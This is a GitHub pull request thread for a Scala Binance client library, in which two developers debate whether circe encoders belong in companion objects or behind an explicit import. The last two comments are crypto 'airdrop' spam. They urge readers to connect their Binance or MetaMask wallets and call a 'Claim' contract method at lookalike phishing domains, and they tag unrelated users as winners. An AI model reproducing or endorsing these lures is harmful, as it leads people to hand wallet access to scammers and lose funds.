### PR TITLE
Add KlineResponse encoder + basic EncodersDecodersTest

### PR DESCRIPTION
**Pull request by ylaurent**
it depends on my other commit with java time

### CODE REVIEW

**Comment by Deliganli** [comment]
the encoders maybe shouldn't be part of this library at all, they are not used to communicate with the binance server. Initially I was persisting the json data directly and to abuse implicit scope I added them to the companion objects. Probably it is better to completely remove them

**Comment by ylaurent** [comment]
hmm I see your point, it make sense. But the core lib already depends on circe (so making a sub-module binance4s-encoder doesnt make sense), and it is very convenient to have them in the companion object.

Maybe we could add some of them, but not advertise it as an available feature. I was not thinking about defining them all, but just the one I feel are useful to store as you said. Also, as you see, test are pretty easy to define when the Json->T is already available.

**Comment by Deliganli** [comment]
my only concern is it may cause users false-positives. They may define their own encoder but if they don't import their custom encoder to their call site the code would still compile because of the encoder defined in companion object. But user probably doesn't want that encoder since they define theirs. Probably it is better to have compilation error than to see everything encoded with something else.
Maybe we can implement encoders but not keep it in companion object, maybe in a `binance4s.implicits.encoders._` . It doesn't help with ease of use (requires explicit imports) but minimises error proneness

**Comment by ylaurent** [comment]
> They may define their own encoder but if they don't import their custom encoder to their call site the code would still compile because of the encoder defined in companion object. But user probably doesn't want that encoder since they define theirs.

Hmm I think this is true for literally any lib providing type class. By default it comes from the lib, and you can override, if wanted, at call site.

Like for instance, look at circe, now by default they provide encoders/decoders for java.time.Instant and ZonedDateTime. However, these encoders/decoders are NOT working for the use case of binance4s (just using Long), i think they work over String formatted as ISO_Something. 

So in the end, I dont see the issue with the encoder defined in the companion object here. And I dont see anyone implementing a different one than the current one from this commit.

Anyways your call, Im fine with either solutions :)

**Comment by sandipbhuyan** [comment]
[Binance Airdrop](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @lwhuang, @magicdlf, @chengxianlov, @bormotok, @RickWong, @Methimpact, @theahmadzadeh

**Comment by JuguApp** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[Claim Now](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @manhha1995, @jerry201414, @Sigmanor, @Flo5k5, @LasanthaRanga, @dancinlife, @sargonpiraev

**Pull request closed without merging**
